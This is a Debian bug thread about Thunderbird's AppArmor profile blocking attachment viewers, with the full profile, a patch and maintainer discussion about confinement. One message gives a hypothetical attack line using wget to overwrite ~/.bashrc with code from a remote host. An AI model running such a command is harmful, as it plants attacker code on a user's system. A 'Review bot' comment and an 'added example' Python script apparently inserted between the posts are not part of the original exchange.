
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced


Kevin Keijzer

Feb 16, 2017, 7:00:02 PM
Package: thunderbird
Version: 1:45.7.1-1
Severity: normal

The Thunderbird AppArmor profile breaks the ability to open attachments
directly. (Saving them is possible.)

For instance, when attempting to open an attached .png by selecting 'Open with
Image Viewer', /usr/bin/eog fails to launch:

audit: type=1400 audit(1487288200.755:153): apparmor="DENIED" operation="exec"
profile="thunderbird" name="/usr/bin/eog" pid=5668 comm="thunderbird"
requested_mask="x" denied_mask="x" fsuid=1000 ouid=0

Instead, a file type association prompt is shown, which doesn't do anything
useful.

Similar warnings are shown for /usr/bin/evince (.pdf), /usr/bin/file-roller
(.tar.gz) and /usr/lib/libreoffice/program/soffice (.odt), but for some reason
I am able to open .txt files with /usr/bin/gedit without issues.



-- System Information:
Debian Release: 9.0
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=nl_NL.UTF-8, LC_CTYPE=nl_NL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages thunderbird depends on:
ii debianutils 4.8.1
ii fontconfig 2.11.0-6.7
ii libasound2 1.1.3-4
ii libatk1.0-0 2.22.0-1
ii libc6 2.24-9
ii libcairo2 1.14.8-1
ii libdbus-1-3 1.10.14-1
ii libdbus-glib-1-2 0.108-2
ii libevent-2.0-5 2.0.21-stable-2.1
ii libffi6 3.2.1-6
ii libfontconfig1 2.11.0-6.7
ii libfreetype6 2.6.3-3+b1
ii libgcc1 1:6.3.0-6
ii libgdk-pixbuf2.0-0 2.36.4-1
ii libglib2.0-0 2.50.2-2
ii libgtk2.0-0 2.24.31-2
ii libhunspell-1.4-0 1.4.1-2+b1
ii libicu57 57.1-5
ii libnspr4 2:4.12-6
ii libnss3 2:3.26.2-1
ii libpango-1.0-0 1.40.3-3
ii libpangocairo-1.0-0 1.40.3-3
ii libpangoft2-1.0-0 1.40.3-3
ii libpixman-1-0 0.34.0-1
ii libsqlite3-0 3.16.2-2
ii libstartup-notification0 0.12-4
ii libstdc++6 6.3.0-6
ii libvpx4 1.6.1-2
ii libx11-6 2:1.6.4-3
ii libxcomposite1 1:0.4.4-2
ii libxdamage1 1:1.1.4-2+b1
ii libxext6 2:1.3.3-1
ii libxfixes3 1:5.0.3-1
ii libxrender1 1:0.9.10-1
ii libxt6 1:1.1.5-1
ii psmisc 22.21-2.1+b1
ii zlib1g 1:1.2.8.dfsg-5

Versions of packages thunderbird recommends:
ii hunspell-en-us [hunspell-dictionary] 20070829-7
ii hunspell-nl [hunspell-dictionary] 1:5.2.5-1
pn lightning <none>

Versions of packages thunderbird suggests:
ii apparmor 2.11.0-2
pn fonts-lyx <none>
ii libgssapi-krb5-2 1.15-1

-- Configuration Files:
/etc/apparmor.d/usr.bin.thunderbird changed:
@{MOZ_LIBDIR}=/usr/lib/thunderbird
profile thunderbird /usr/lib/thunderbird/thunderbird {
#include <abstractions/audio>
#include <abstractions/aspell>
#include <abstractions/cups-client>
# TODO: finetune this for required accesses
#include <abstractions/dbus>
#include <abstractions/dbus-accessibility>
#include <abstractions/dbus-session>
#include <abstractions/gnome>
#include <abstractions/ibus>
#include <abstractions/nameservice>
#include <abstractions/p11-kit>
#include <abstractions/private-files>
#include <abstractions/ssl_certs>
#include <abstractions/ubuntu-browsers>
#include <abstractions/ubuntu-helpers>
# For Xubuntu to launch the browser
/usr/bin/exo-open ixr,
/usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr,
/etc/xdg/xdg-xubuntu/xfce4/helpers.rc r,
/etc/xdg/xfce4/helpers.rc r,
# for crash reports?
ptrace (read,trace) peer=@{profile_name},
/usr/lib/thunderbird/thunderbird ixr,
# Pulseaudio
/usr/bin/pulseaudio Pixr,
owner @{HOME}/.{cache,config}/dconf/user rw,
owner /run/user/[0-9]*/dconf/user rw,
owner @{HOME}/.config/gtk-3.0/bookmarks r,
deny owner @{HOME}/.local/share/gvfs-metadata/* r,
# potentially extremely sensitive files
audit deny @{HOME}/.gnupg/** mrwkl,
audit deny @{HOME}/.ssh/** mrwkl,
# rw access to HOME is useful when sending/receiving attachments
owner @{HOME}/** rw,
# Required for LVM setups
/sys/devices/virtual/block/dm-[0-9]*/uevent r,
# Addons (too lax for thunderbird)
##include <abstractions/ubuntu-browsers.d/firefox>
# for networking
network inet stream,
network inet6 stream,
@{PROC}/[0-9]*/net/if_inet6 r,
@{PROC}/[0-9]*/net/ipv6_route r,
@{PROC}/[0-9]*/net/dev r,
@{PROC}/[0-9]*/net/wireless r,
# should maybe be in abstractions
/etc/ r,
/etc/mime.types r,
/etc/mailcap r,
/etc/xdg/*buntu/applications/defaults.list r, # for all derivatives
/etc/xfce4/defaults.list r,
/usr/share/xubuntu/applications/defaults.list r,
owner @{HOME}/.local/share/applications/defaults.list r,
owner @{HOME}/.local/share/applications/mimeapps.list r,
owner @{HOME}/.local/share/applications/mimeinfo.cache r,
owner /tmp/** m,
owner /var/tmp/** m,
/tmp/.X[0-9]*-lock r,
/etc/udev/udev.conf r,
# Doesn't seem to be required, but noisy. Maybe allow 'r' for 'b*' if needed.
# Possibly move to an abstraction if anything else needs it.
deny /run/udev/data/** r,
/etc/timezone r,
/etc/wildmidi/wildmidi.cfg r,
# thunderbird specific
/etc/thunderbird/ r,
/etc/thunderbird/** r,
/etc/xul-ext/** r,
/etc/xulrunner-2.0*/ r,
/etc/xulrunner-2.0*/** r,
/etc/gre.d/ r,
/etc/gre.d/* r,
# noisy
deny @{MOZ_LIBDIR}/** w,
deny /usr/lib/thunderbird-addons/** w,
deny /usr/lib/xulrunner-addons/** w,
deny /usr/lib/xulrunner-*/components/*.tmp w,
deny /.suspended r,
deny /boot/initrd.img* r,
deny /boot/vmlinuz* r,
deny /var/cache/fontconfig/ w,
deny @{HOME}/.local/share/recently-used.xbel r,
deny @{HOME}/.* r,
# TODO: investigate
deny /usr/bin/gconftool-2 x,
owner @{PROC}/[0-9]*/mountinfo r,
owner @{PROC}/[0-9]*/stat r,
owner @{PROC}/[0-9]*/task/[0-9]*/stat r,
/sys/devices/pci[0-9]*/**/uevent r,
/etc/mtab r,
/etc/fstab r,
# Needed for the crash reporter
owner @{PROC}/[0-9]*/environ r,
owner @{PROC}/[0-9]*/auxv r,
/etc/lsb-release r,
/usr/bin/expr ix,
/sys/devices/system/cpu/ r,
/sys/devices/system/cpu/** r,
# about:memory
owner @{PROC}/[0-9]*/statm r,
owner @{PROC}/[0-9]*/smaps r,
# Needed for container to work in xul builds
/usr/lib/xulrunner-*/plugin-container ixr,
# allow access to documentation and other files the user may want to look
# at in /usr and /opt
/usr/ r,
/usr/** r,
/opt/ r,
/opt/** r,
# so browsing directories works
/ r,
/**/ r,
# per-user thunderbird configuration
owner @{HOME}/.thunderbird/ rw,
owner @{HOME}/.thunderbird/** rw,
owner @{HOME}/.thunderbird/**/storage.sdb k,
owner @{HOME}/.thunderbird/**/*.{db,parentlock,sqlite}* k,
owner @{HOME}/.thunderbird/plugins/** rm,
owner @{HOME}/.thunderbird/**/plugins/** rm,
owner @{HOME}/.cache/thunderbird/ rw,
owner @{HOME}/.cache/thunderbird/** rw,
# system emails
owner /var/mail/* rwlk,
#
# Extensions
# /usr/share/.../extensions/... is already covered by '/usr/** r', above.
# Allow 'x' for downloaded extensions, but inherit policy for safety
owner @{HOME}/.thunderbird/**/extensions/** mixrw,
owner @{HOME}/.mozilla/extensions/** mixr,
/usr/share/xul-ext/**/*.sqlite rk,
/usr/lib/xul-ext/**/*.sqlite rk,
/usr/lib/thunderbird-addons/extensions/**/*.sqlite rk,
deny @{MOZ_LIBDIR}/update.test w,
deny /usr/lib/mozilla/extensions/**/ w,
deny /usr/lib/xulrunner-addons/extensions/**/ w,
deny /usr/share/mozilla/extensions/**/ w,
deny /usr/share/mozilla/ w,
# Miscellaneous (to be abstracted)
# Ideally these would use a child profile. They are all ELF executables
# so running with 'Ux', while not ideal, is ok because we will at least
# benefit from glibc's secure execute.
/usr/bin/mkfifo Uxr, # investigate
/bin/ps Uxr,
/bin/uname Uxr,
/usr/bin/locale Uxr,
/usr/bin/gpg Cx -> gpg,
profile gpg {
#include <abstractions/base>
# Required to import keys from keyservers
#include <abstractions/nameservice>
#include <abstractions/p11-kit>
/usr/share/xul-ext/enigmail/chrome/enigmail.jar r,
# For smartcards?
/dev/bus/usb/ r,
/dev/bus/usb/[0-9]*/ r,
/dev/bus/usb/[0-9]*/[0-9]* r,
# LDAP key servers
/etc/ldap/ldap.conf r,
/usr/bin/gpg mr,
/usr/lib/gnupg/gpgkeys_* ix,
owner @{HOME}/.gnupg r,
owner @{HOME}/.gnupg/gpg.conf r,
owner @{HOME}/.gnupg/random_seed rwk,
owner @{HOME}/.gnupg/pubring.gpg{,~} rw,
owner @{HOME}/.gnupg/secring.gpg rw,
owner @{HOME}/.gnupg/trustdb.gpg rw,
owner @{HOME}/.gnupg/*.gpg.{lock,tmp} rwl,
owner @{HOME}/.gnupg/.#*[0-9] rw,
owner @{HOME}/.gnupg/.#*[0-9]x rwl,
owner @{HOME}/** r,
owner /run/user/[0-9]*/keyring-*/gpg rw,
# for inline pgp
owner /tmp/encfile rw,
owner /tmp/encfile-[0-9]* rw,
}
/usr/bin/gpg2 Cx -> gpg2,
/usr/bin/gpgconf Cx -> gpg2,
/usr/bin/gpg-connect-agent Cx -> gpg2,
# TB tries to create this file but has no business doing so
deny @{HOME}/.gnupg/gpg-agent.conf w,
profile gpg2 {
#include <abstractions/base>
# Required to import keys from keyservers
#include <abstractions/nameservice>
#include <abstractions/p11-kit>
/usr/lib/gnupg2/gpg2keys_hkp ix,
# silence noise from enigmail 1.9+
deny owner @{HOME}/.thunderbird/*/.parentlock w,
deny owner @{HOME}/.thunderbird/*/panacea.dat w,
deny owner @{HOME}/.thunderbird/*/*.mab w,
deny owner @{HOME}/.thunderbird/**/*.msf w,
deny owner @{HOME}/.cache/thunderbird/**/_CACHE_* w,
/usr/share/xul-ext/enigmail/chrome/enigmail.jar r,
# For smartcards?
/dev/bus/usb/ r,
/dev/bus/usb/[0-9]*/ r,
/dev/bus/usb/[0-9]*/[0-9]* r,
# LDAP key servers
/etc/ldap/ldap.conf r,
/usr/bin/gpg-connect-agent mr,
owner @{HOME}/.gnupg/S.gpg-agent rw,
owner @{HOME}/.gnupg/S.dirmngr rw,
/usr/bin/gpg2 mr,
owner @{HOME}/.gnupg/ rw,
owner @{HOME}/.gnupg/gpg.conf r,
owner @{HOME}/.gnupg/random_seed rwk,
owner @{HOME}/.gnupg/pubring.gpg{,~} rw,
owner @{HOME}/.gnupg/secring.gpg rw,
owner @{HOME}/.gnupg/trustdb.gpg rw,
owner @{HOME}/.gnupg/*.gpg.{lock,tmp} rwl,
owner @{HOME}/.gnupg/.gpg-*.lock rwl,
owner @{HOME}/.gnupg/gnupg_spawn_*.lock rwl,
owner @{HOME}/.gnupg/.#lk0x[0-9a-f]* rwl,
owner @{HOME}/.gnupg/.gpg-v[0-9]*-migrated rw,
owner @{HOME}/** r,
owner @{PROC}/@{pids}/mountinfo r,
# for inline pgp
owner /tmp/encfile rw,
owner /tmp/encfile-[0-9]* rw,
# for signature generation
owner /tmp/nsemail.eml w,
owner /tmp/nsemail-[0-9]*.eml w,
# for signature verifications
owner /tmp/data.sig r,
owner /tmp/data-[0-9]*.sig r,
owner /tmp/gpg-[a-zA-Z0-9]*/S.gpg-agent rw,
}
# Site-specific additions and overrides. See local/README for details.
#include <local/usr.bin.thunderbird>
}


-- no debconf information

Vincas Dargis

Oct 24, 2017, 12:40:03 PM
I've started to work on the patch in comment #60. Notifying to avoid work duplication.

Vincas Dargis

Oct 24, 2017, 2:00:03 PM
Patch snippet:

+ # Allow opening attachments
+ /{usr/,}bin/* Cx -> sanitized_helper,
+ /{usr/,}sbin/* Cx -> sanitized_helper,
+ /usr/local/{bin,sbin}/* Cx -> sanitized_helper,
+ /usr/lib/libreoffice/program/soffice Cxr -> sanitized_helper,
+ /usr/bin/evince Pix,
+ /usr/bin/totem Pix,
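
Review bot: the `/{usr/,}sbin/* Cx -> sanitized_helper,` rule gives the confined mail client exec access to every system administration binary, including set-uid ones, although no attachment viewer lives in sbin; drop that line. The explicit `/usr/bin/evince Pix,` and `/usr/bin/totem Pix,` rules overlap the preceding `/{usr/,}bin/*` glob with a different transition, so the effective confinement of those two helpers depends on rule precedence and the list of exceptions has to be maintained by hand; test whether the glob alone is sufficient and remove them if so, or document why those two need their own profiles.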

Do we really need sbin? I kind of doubt there will be "document viewers" there, and it has setuid applications like pppd and
exim4, which is not comforting.

Also, if sanitized_helper contains:

`/{usr/,}bin/* Pixr,`

Doesn't this automatically mean that this line in usr.bin.thunderbird profile

`/{usr/,}bin/* Cx -> sanitized_helper,`

will in result launch /usr/bin/totem with its *P*rofile?

I wonder, because `abstractions/ubuntu-media-players` has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?

I'll do some testing tomorrow. If there are extra rules for XFCE, maybe I should try Thunderbird on several DEs.

intrigeri

Oct 25, 2017, 3:50:03 AM
Hi Vincas,

Vincas Dargis:
> + # Allow opening attachments
> + /{usr/,}bin/* Cx -> sanitized_helper,
> + /{usr/,}sbin/* Cx -> sanitized_helper,
> + /usr/local/{bin,sbin}/* Cx -> sanitized_helper,
> + /usr/bin/evince Pix,
> + /usr/bin/totem Pix,

[...]

> Do we really need sbin? I kind of doubt there will be "document viewers" there, and it has
> setuid applications like pppd and exim4, which is not comforting.

Good catch! Makes sense to me, feel free to drop the sbin bits as long
as it does not obviously break stuff in your tests :)

> Also, if sanitized_helper contains:

> `/{usr/,}bin/* Pixr,`

> Doesn't this automatically mean that this line in usr.bin.thunderbird profile

> `/{usr/,}bin/* Cx -> sanitized_helper,`

> will in result launch /usr/bin/totem with its *P*rofile?

> I wonder, because `abstractions/ubuntu-media-players` has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
> I'll do some testing tomorrow.

Indeed, it might be that the specific rules about evince & totem
you're quoting from my patch above are not needed. It would be nice if
we could drop them (and the maintenance cost of hard-coding a list of
exceptions) so I'm hoping your testing confirms your hypothesis :)

> If there are extra rules for XFCE, maybe I should try Thunderbird on several DEs.

This would be sweet but right now the thing is totally broken, so
fixing them on the default DE (GNOME) only would be a huge improvement
already. I suggest you focus on getting this done first, and later we
can test (or call for testing!) on other DEs. There's no way we can
test all relevant configurations, so we'll need to rely on user
testing to some degree anyway.

Cheers,
--
intrigeri

Vincas Dargis

Oct 25, 2017, 12:00:02 PM
On 2017.10.25 10:26, intrigeri wrote:
> Indeed, it might be that the specific rules about evince & totem
> you're quoting from my patch above are not needed. It would be nice if
> we could drop them (and the maintenance cost of hard-coding a list of
> exceptions) so I'm hoping your testing confirms your hypothesis :)

Yes, I am going to test multiple-format attachments just now.

>> If there are extra rules for XFCE, maybe I should try Thunderbird on several DEs.
>
> This would be sweet but right now the thing is totally broken, so
> fixing them on the default DE (GNOME) only would be a huge improvement
> already. I suggest you focus on getting this done first, and later we
> can test (or call for testing!) on other DEs. There's no way we can
> test all relevant configurations, so we'll need to rely on user
> testing to some degree anyway.

OK, if we call this urgent, we do it as such. Personally, I would like to have a bunch of abstractions to contain all image
and document viewers, editors and what not, so that browsers, email clients and IMs could include them (or one big
proxy-policy file that includes all these grouped -browsers -editors -viewers) and so have a more restrictive policy. With
the pending patch, some Thunderbird exploit just needs to execute `wget -O ~/.bashrc http://cracr.io:1337/own` and it's
endgame. But let's fix this critical broken stuff and do it the right way later.

intrigeri

Oct 25, 2017, 1:30:02 PM
Vincas Dargis:
> On 2017.10.25 10:26, intrigeri wrote:
>> Indeed, it might be that the specific rules about evince & totem
>> you're quoting from my patch above are not needed. It would be nice if
>> we could drop them (and the maintenance cost of hard-coding a list of
>> exceptions) so I'm hoping your testing confirms your hypothesis :)

> Yes, I am going to test multiple-format attachments just now.

Amazing! :)

> Personally, I would like to have a bunch of abstractions to contain
> all image and document viewers, editors and what not, […]

I'm not looking forward to maintaining these abstractions.

> With the pending patch, some Thunderbird exploit just needs to execute
> `wget -O ~/.bashrc http://cracr.io:1337/own` and it's endgame.

Right. Sadly, the other currently available option is what we have
now: breaking critical stuff in a way that encourages people to fully
disable AppArmor and open a bunch of other holes in their system (by
disabling all confinement for all other apps). This is exactly what
I've been trying to avoid in the last years while working on AppArmor
in Debian, and I'm sad we're shipping an AppArmor profile that breaks
basic functionality here.

> But let's fix this critical broken stuff and do it the right way later.

ACK, glad we're on the same page :)

[Now, if we want to talk about the right way, I doubt it'll be with
AppArmor: Flatpak and friends finally tackle the problems AppArmor
can't solve for GUI apps.]

Cheers,
--
intrigeri

Vincas Dargis

Oct 25, 2017, 3:30:02 PM
On 2017.10.25 10:26, intrigeri wrote:
>> Also, if sanitized_helper contains:
>
>> `/{usr/,}bin/* Pixr,`
>
>> Doesn't this automatically mean that this line in usr.bin.thunderbird profile
>
>> `/{usr/,}bin/* Cx -> sanitized_helper,`
>
>> will in result launch /usr/bin/totem with its *P*rofile?
>
>> I wonder, because `abstractions/ubuntu-media-players` has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
>> I'll do some testing tomorrow.
>
> Indeed, it might be that the specific rules about evince & totem
> you're quoting from my patch above are not needed. It would be nice if
> we could drop them (and the maintenance cost of hard-coding a list of
> exceptions) so I'm hoping your testing confirms your hypothesis :)

Strange, a preliminary test shows that totem is launched with its profile, meanwhile evince is launched via
thunderbird//sanitized_helper for an unknown reason. I need to test some more.

And totem does not even show its GUI in a fresh Debian Sid GNOME. Maybe it needs the patches you are proposing upstream.

Simon Deziel

Oct 25, 2017, 3:40:03 PM
On 2017-10-25 03:08 PM, Vincas Dargis wrote:
> On 2017.10.25 10:26, intrigeri wrote:
>>> Also, if sanitized_helper contains:
>>
>>> `/{usr/,}bin/* Pixr,`
>>
>>> Doesn't this automatically mean that this line in usr.bin.thunderbird
>>> profile
>>
>>> `/{usr/,}bin/* Cx -> sanitized_helper,`
>>
>>> will in result launch /usr/bin/totem with its *P*rofile?
>>
>>> I wonder, because `abstractions/ubuntu-media-players` has
>>> `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
>>> I'll do some testing tomorrow.
>>
>> Indeed, it might be that the specific rules about evince & totem
>> you're quoting from my patch above are not needed. It would be nice if
>> we could drop them (and the maintenance cost of hard-coding a list of
>> exceptions) so I'm hoping your testing confirms your hypothesis :)
>
> Strange, a preliminary test shows that totem is launched with its
> profile, meanwhile evince is launched via thunderbird//sanitized_helper
> for an unknown reason. I need to test some more.

It's been that way for a long time, see [1].

Regards,
Simon

[1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771


Vincas Dargis

Oct 26, 2017, 11:40:02 AM
On 2017.10.25 22:25, Simon Deziel wrote:
>> Strange, a preliminary test shows that totem is launched with its
>> profile, meanwhile evince is launched via thunderbird//sanitized_helper
>> for an unknown reason. I need to test some more.
>
> It's been that way for a long time, see [1].
>
> Regards,
> Simon
>
> [1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771
>

Thanks for the info. Not sure why it's Low priority, if it renders the abstractions (ubuntu-{browsers,..}) that use
sanitized_helper kinda-almost-useless?

intrigeri

Oct 27, 2017, 5:40:02 AM
Control: tag -1 + fixed-upstream

Thanks to Vincas this was fixed upstream:
https://git.launchpad.net/apparmor-profiles/tree/ubuntu/17.10/usr.bin.thunderbird

Carsten, could you please pull this updated profile?

Cheers,
--
intrigeri

Cyrille Chépélov

Nov 21, 2017, 7:40:04 AM
found 855346 1:52.4.0-1
fixed 855346 1:52.4.0-2~exp1


Greetings,

I've been hit with the same issue (GNOME 3.26 environment), and while I can't
comment on what the apparmor-ing was expected to achieve, the experimental
version does fix the "can't open attachments" issue for me.

Thanks!

    -- Cyrille

Massimo Maiurana

Dec 7, 2017, 4:10:03 PM
I can confirm that I'm experiencing this bug now, after a recent upgrade
two days ago.
I can't open attachments anymore but I'm still able to save them.
Running thunderbird from a console I can see that it complains about
missing permissions, even for just opening recently-used.xbel.

--
Massimo Maiurana
Ragusa (RG)

Massimo Maiurana

Dec 8, 2017, 7:30:03 AM
On Thu, 7 Dec 2017 21:59:28 +0100 Massimo Maiurana <maiu...@gmail.com>
wrote:
> I can confirm that I'm experiencing this bug now, after a recent upgrade
> two days ago.

Solved for now by replacing the current apparmor profile with the one in
message #126; at least I can open attachments again until a proper fix
is pulled from upstream.

Paolo Inaudi

Dec 8, 2017, 8:10:03 AM
The profile from #126 still doesn't allow opening links in Firefox:

dic 08 14:06:43 paolo-desktop audit[19990]: AVC apparmor="DENIED"
operation="exec" profile="thunderbird" name="/usr/lib/firefox/firefox"
pid=19990 comm="thunderbird" requested_mask="x" denied_mask="x"
fsuid=1000 ouid=0

Paolo Inaudi

On Fri, 8 Dec 2017 13:22:56 +0100 Massimo Maiurana <maiu...@gmail.com>

Massimo Maiurana

Dec 8, 2017, 8:20:03 AM
Paolo Inaudi wrote on 08/12/2017 at 14:08:
> The profile from #126 still doesn't allow opening links in Firefox:
>

Here it does, I just opened a link in a message as a new tab in
Firefox. Don't know why though.

Tim Rühsen

Jan 5, 2018, 4:10:03 AM
On Fri, 8 Dec 2017 14:08:13 +0100 Paolo Inaudi <p91...@gmail.com> wrote:
> The profile from #126 still doesn't allow opening links in Firefox:
>
> dic 08 14:06:43 paolo-desktop audit[19990]: AVC apparmor="DENIED"
> operation="exec" profile="thunderbird" name="/usr/lib/firefox/firefox"
> pid=19990 comm="thunderbird" requested_mask="x" denied_mask="x"
> fsuid=1000 ouid=0

Same problem here on latest Debian unstable.

Fix / Work-around:

Add
/usr/lib/firefox/firefox ixr,
to
/etc/apparmor.d/usr.bin.thunderbird
and execute
service apparmor reload

Not sure why /usr/bin/firefox is a symlink to /usr/lib/firefox/firefox
and if it has something to do with our problem.

Regards, Tim
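
The denials quoted in this thread (the eog line in the original report and the firefox line in Paolo's message) are the raw material for rules like the one Tim adds above. As an added example, not code from the Debian thunderbird package or from AppArmor, the script below parses AppArmor audit events, keeps only exec denials, and drafts profile lines for review; it uses the `Cx -> sanitized_helper` transition the patch in this thread settled on for /bin and /usr/bin, and the third sample line (a read denial) is constructed.

```python
"""Draft AppArmor profile rules from exec denials like those in this thread.

Added example; not code from the Debian thunderbird package or AppArmor.
The first two sample lines are the denials quoted in the thread (eog and
firefox); the third is constructed. Output is a draft for human review.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SAMPLE_LINES = [
    # From the thread: attachment viewer denied (kernel audit format)
    'audit: type=1400 audit(1487288200.755:153): apparmor="DENIED" operation="exec" '
    'profile="thunderbird" name="/usr/bin/eog" pid=5668 comm="thunderbird" '
    'requested_mask="x" denied_mask="x" fsuid=1000 ouid=0',
    # From the thread: browser denied (journald format)
    'dic 08 14:06:43 paolo-desktop audit[19990]: AVC apparmor="DENIED" '
    'operation="exec" profile="thunderbird" name="/usr/lib/firefox/firefox" '
    'pid=19990 comm="thunderbird" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0',
    # Constructed: a read denial, not an exec, so no rule is drafted
    'audit: type=1400 audit(1512680000.000:200): apparmor="DENIED" operation="open" '
    'profile="thunderbird" name="/home/user/.local/share/recently-used.xbel" '
    'pid=7001 comm="thunderbird" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000',
]

# key="quoted value" or key=bare_value, as the AppArmor LSM emits them
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Denial:
    profile: str
    operation: str
    name: str
    requested_mask: str


def parse_denial(line: str) -> Optional[Denial]:
    """Return a Denial for an apparmor="DENIED" event, None for anything else."""
    fields = {k: quoted or bare for k, quoted, bare in _KV.findall(line)}
    if fields.get("apparmor") != "DENIED":
        return None
    return Denial(fields.get("profile", ""), fields.get("operation", ""),
                  fields.get("name", ""), fields.get("requested_mask", ""))


def draft_rule(d: Denial) -> Optional[str]:
    """Draft one profile line for an exec denial; None for other operations.

    /bin and /usr/bin binaries get the transition the thread converged on, a
    child profile (Cx) into sanitized_helper; ix would run the helper under
    Thunderbird's own profile and Px needs a profile for the helper, so other
    paths are emitted as a comment for an explicit decision instead.
    """
    if d.operation != "exec" or "x" not in d.requested_mask:
        return None
    if re.fullmatch(r"/(usr/)?bin/[^/]+", d.name):
        return f"{d.name} Cx -> sanitized_helper,"
    return f"# REVIEW: {d.profile} denied exec of {d.name}; choose ix/Px/Cx explicitly"


def draft_rules(lines: List[str]) -> Dict[str, List[str]]:
    """Drafted rules grouped by the denying profile, de-duplicated, in order."""
    out: Dict[str, List[str]] = {}
    for line in lines:
        d = parse_denial(line)
        rule = draft_rule(d) if d else None
        if rule and rule not in out.setdefault(d.profile, []):
            out[d.profile].append(rule)
    return out
```

Feed it `journalctl -k` or `/var/log/audit/audit.log` output and add the drafted lines to the profile only after deciding the transition for each REVIEW entry, then reload the profile as Tim describes.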


intrigeri

Jan 7, 2018, 6:10:03 AM
Tim Rühsen:
> On Fri, 8 Dec 2017 14:08:13 +0100 Paolo Inaudi <p91...@gmail.com> wrote:
>> The profile from #126 still doesn't allow opening links in Firefox:
>>
>> dic 08 14:06:43 paolo-desktop audit[19990]: AVC apparmor="DENIED"
>> operation="exec" profile="thunderbird" name="/usr/lib/firefox/firefox"
>> pid=19990 comm="thunderbird" requested_mask="x" denied_mask="x"
>> fsuid=1000 ouid=0

> Same problem here on latest Debian unstable.

Thanks for your feedback.

I believe I've fixed this upstream in AppArmor itself:
https://gitlab.com/apparmor/apparmor/commit/ff66ca90390d14fa710ac28cc20728f934152724
… which will make it into Debian once we package AppArmor 2.12.

Cheers,
--
intrigeri